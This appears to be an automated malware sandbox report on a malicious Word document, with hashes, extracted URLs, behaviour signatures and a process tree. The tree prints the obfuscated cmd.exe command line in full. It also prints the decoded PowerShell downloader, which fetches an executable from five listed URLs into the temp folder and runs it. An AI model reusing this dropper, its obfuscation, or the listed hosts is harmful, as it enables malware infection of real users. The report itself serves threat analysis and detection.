Overview
overview
10Static
static
8test/0b627...5b.doc
windows7_x64
10test/0b627...5b.doc
windows10_x64
10test/0dded...66.doc
windows7_x64
10test/0dded...66.doc
windows10_x64
10test/91B5D...9D.msi
windows7_x64
8test/91B5D...9D.msi
windows10_x64
8test/ed01e...aa.exe
windows7_x64
10test/ed01e...aa.exe
windows10_x64
10test/fe9d7...8f.exe
windows7_x64
10test/fe9d7...8f.exe
windows10_x64
10Analysis
-
max time kernel
138s -
max time network
148s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
02-12-2021 10:54
Static task
static1
Behavioral task
behavioral1
Sample
test/0b627b4eca9b9e8bd04a0d1a103876f6e0fa91049fd0b51bae9ae41acaacf15b.doc
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
test/0b627b4eca9b9e8bd04a0d1a103876f6e0fa91049fd0b51bae9ae41acaacf15b.doc
Resource
win10-en-20211104
Behavioral task
behavioral3
Sample
test/0dded430c1958ae0ec60c2d50ab99f562269ad1ee09db17606661bd55cd29c66.doc
Resource
win7-en-20211014
Behavioral task
behavioral4
Sample
test/0dded430c1958ae0ec60c2d50ab99f562269ad1ee09db17606661bd55cd29c66.doc
Resource
win10-en-20211104
Behavioral task
behavioral5
Sample
test/91B5DB3C0CCBD68BD04C24571E27F99D.msi
Resource
win7-en-20211014
Behavioral task
behavioral6
Sample
test/91B5DB3C0CCBD68BD04C24571E27F99D.msi
Resource
win10-en-20211104
Behavioral task
behavioral7
Sample
test/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Resource
win7-en-20211104
Behavioral task
behavioral8
Sample
test/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Resource
win10-en-20211014
Behavioral task
behavioral9
Sample
test/fe9d72dd4b046bafdd144902ab570297629f83d06afb5a9ba7703382a29d588f.exe
Resource
win7-en-20211104
Behavioral task
behavioral10
Sample
test/fe9d72dd4b046bafdd144902ab570297629f83d06afb5a9ba7703382a29d588f.exe
Resource
win10-en-20211014
General
-
Target
test/0dded430c1958ae0ec60c2d50ab99f562269ad1ee09db17606661bd55cd29c66.doc
-
Size
81KB
-
MD5
fac7b441a730abf96b210a8db9dbf3d1
-
SHA1
9f5bb869b95136f51b954e4284f99168ff0e91fb
-
SHA256
0dded430c1958ae0ec60c2d50ab99f562269ad1ee09db17606661bd55cd29c66
-
SHA512
0a5ec69ec554639ede43c359f38f8d2e52718b7e29a06aa112ff8cdc99b2777a39c3a9455d3796033a813cceda7487104fb8f0027eccfa138bcd0c2064606f07
Malware Config
Extracted
http://www.serefozata.com/axf
http://www.livingbranchanimalsciences.com/zVMQFL
http://www.donghodaian.com/jiPViP
http://sprayzee.com/iiWYe6z
http://yasarkemalplatformu.org/s
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 892 3448 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 18 3532 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
Processes:
cmd.execmd.exepid process 892 cmd.exe 1840 cmd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3448 WINWORD.EXE 3448 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 3532 powershell.exe 3532 powershell.exe 3532 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3532 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
WINWORD.EXEpid process 3448 WINWORD.EXE 3448 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 3448 WINWORD.EXE 3448 WINWORD.EXE 3448 WINWORD.EXE 3448 WINWORD.EXE 3448 WINWORD.EXE 3448 WINWORD.EXE 3448 WINWORD.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
WINWORD.EXEcmd.execmd.exedescription pid process target process PID 3448 wrote to memory of 508 3448 WINWORD.EXE splwow64.exe PID 3448 wrote to memory of 508 3448 WINWORD.EXE splwow64.exe PID 3448 wrote to memory of 892 3448 WINWORD.EXE cmd.exe PID 3448 wrote to memory of 892 3448 WINWORD.EXE cmd.exe PID 892 wrote to memory of 1840 892 cmd.exe cmd.exe PID 892 wrote to memory of 1840 892 cmd.exe cmd.exe PID 1840 wrote to memory of 3532 1840 cmd.exe powershell.exe PID 1840 wrote to memory of 3532 1840 cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\test\0dded430c1958ae0ec60c2d50ab99f562269ad1ee09db17606661bd55cd29c66.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3448 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:508
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set 8zN=jDYOzpwKEKrWhHFvMIaSaUWRtF;+sQN8P$3di gL:uf{.b=excnB@\90(JZ-lAmGkyoT,C/6'})V&&for %q in (33,50,28,13,46,72,51,9,42,72,26,33,24,62,15,46,50,47,6,59,66,45,0,47,49,24,37,30,47,24,44,22,47,45,69,60,36,47,50,24,26,33,64,0,23,46,72,12,24,24,5,40,70,70,6,6,6,44,28,47,10,47,42,66,4,20,24,20,44,49,66,62,70,20,48,42,52,12,24,24,5,40,70,70,6,6,6,44,60,36,15,36,50,38,45,10,20,50,49,12,20,50,36,62,20,60,28,49,36,47,50,49,47,28,44,49,66,62,70,4,75,16,29,25,39,52,12,24,24,5,40,70,70,6,6,6,44,35,66,50,38,12,66,35,20,36,20,50,44,49,66,62,70,0,36,32,75,36,32,52,12,24,24,5,40,70,70,28,5,10,20,65,4,47,47,44,49,66,62,70,36,36,22,2,47,71,4,52,12,24,24,5,40,70,70,65,20,28,20,10,64,47,62,20,60,5,60,20,24,42,66,10,62,41,44,66,10,38,70,28,72,44,19,5,60,36,24,56,72,52,72,74,26,33,6,35,30,46,72,62,51,30,72,26,33,63,6,45,37,46,37,72,34,54,55,72,26,33,15,4,0,46,72,8,1,64,72,26,33,51,57,8,46,33,47,50,15,40,24,47,62,5,27,72,53,72,27,33,63,6,45,27,72,44,47,48,47,72,26,42,66,10,47,20,49,12,56,33,67,51,9,37,36,50,37,33,64,0,23,74,43,24,10,65,43,33,24,62,15,44,1,66,6,50,60,66,20,35,25,36,60,47,56,33,67,51,9,68,37,33,51,57,8,74,26,33,1,9,4,46,72,12,36,0,72,26,17,42,37,56,56,63,47,24,59,17,24,47,62,37,33,51,57,8,74,44,60,47,50,38,24,12,37,59,38,47,37,31,55,55,55,55,74,37,43,17,50,15,66,64,47,59,17,24,47,62,37,33,51,57,8,26,33,64,36,51,46,72,62,29,58,72,26,45,10,47,20,64,26,73,73,49,20,24,49,12,43,73,73,33,22,42,5,46,72,13,8,61,72,26,78)do set FtX=!FtX!!8zN:~%q,1!&&if %q equ 78 powershell "!FtX:~5!""2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Windows\system32\cmd.exeCmD /V/C"set 8zN=jDYOzpwKEKrWhHFvMIaSaUWRtF;+sQN8P$3di gL:uf{.b=excnB@\90(JZ-lAmGkyoT,C/6'})V&&for %q in (33,50,28,13,46,72,51,9,42,72,26,33,24,62,15,46,50,47,6,59,66,45,0,47,49,24,37,30,47,24,44,22,47,45,69,60,36,47,50,24,26,33,64,0,23,46,72,12,24,24,5,40,70,70,6,6,6,44,28,47,10,47,42,66,4,20,24,20,44,49,66,62,70,20,48,42,52,12,24,24,5,40,70,70,6,6,6,44,60,36,15,36,50,38,45,10,20,50,49,12,20,50,36,62,20,60,28,49,36,47,50,49,47,28,44,49,66,62,70,4,75,16,29,25,39,52,12,24,24,5,40,70,70,6,6,6,44,35,66,50,38,12,66,35,20,36,20,50,44,49,66,62,70,0,36,32,75,36,32,52,12,24,24,5,40,70,70,28,5,10,20,65,4,47,47,44,49,66,62,70,36,36,22,2,47,71,4,52,12,24,24,5,40,70,70,65,20,28,20,10,64,47,62,20,60,5,60,20,24,42,66,10,62,41,44,66,10,38,70,28,72,44,19,5,60,36,24,56,72,52,72,74,26,33,6,35,30,46,72,62,51,30,72,26,33,63,6,45,37,46,37,72,34,54,55,72,26,33,15,4,0,46,72,8,1,64,72,26,33,51,57,8,46,33,47,50,15,40,24,47,62,5,27,72,53,72,27,33,63,6,45,27,72,44,47,48,47,72,26,42,66,10,47,20,49,12,56,33,67,51,9,37,36,50,37,33,64,0,23,74,43,24,10,65,43,33,24,62,15,44,1,66,6,50,60,66,20,35,25,36,60,47,56,33,67,51,9,68,37,33,51,57,8,74,26,33,1,9,4,46,72,12,36,0,72,26,17,42,37,56,56,63,47,24,59,17,24,47,62,37,33,51,57,8,74,44,60,47,50,38,24,12,37,59,38,47,37,31,55,55,55,55,74,37,43,17,50,15,66,64,47,59,17,24,47,62,37,33,51,57,8,26,33,64,36,51,46,72,62,29,58,72,26,45,10,47,20,64,26,73,73,49,20,24,49,12,43,73,73,33,22,42,5,46,72,13,8,61,72,26,78)do set FtX=!FtX!!8zN:~%q,1!&&if %q equ 78 powershell "!FtX:~5!""3⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$nsH='BKf';$tmv=new-object Net.WebClient;$kjR='http://www.serefozata.com/axf@http://www.livingbranchanimalsciences.com/zVMQFL@http://www.donghodaian.com/jiPViP@http://sprayzee.com/iiWYe6z@http://yasarkemalplatformu.org/s'.Split('@');$wdN='mBN';$Gwb = '390';$vzj='EDk';$BJE=$env:temp+'\'+$Gwb+'.exe';foreach($TBK in $kjR){try{$tmv.DownloadFile($TBK, $BJE);$DKz='hij';If ((Get-Item $BJE).length -ge 80000) {Invoke-Item $BJE;$kiB='mQZ';break;}}catch{}}$Wfp='HEA';"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3532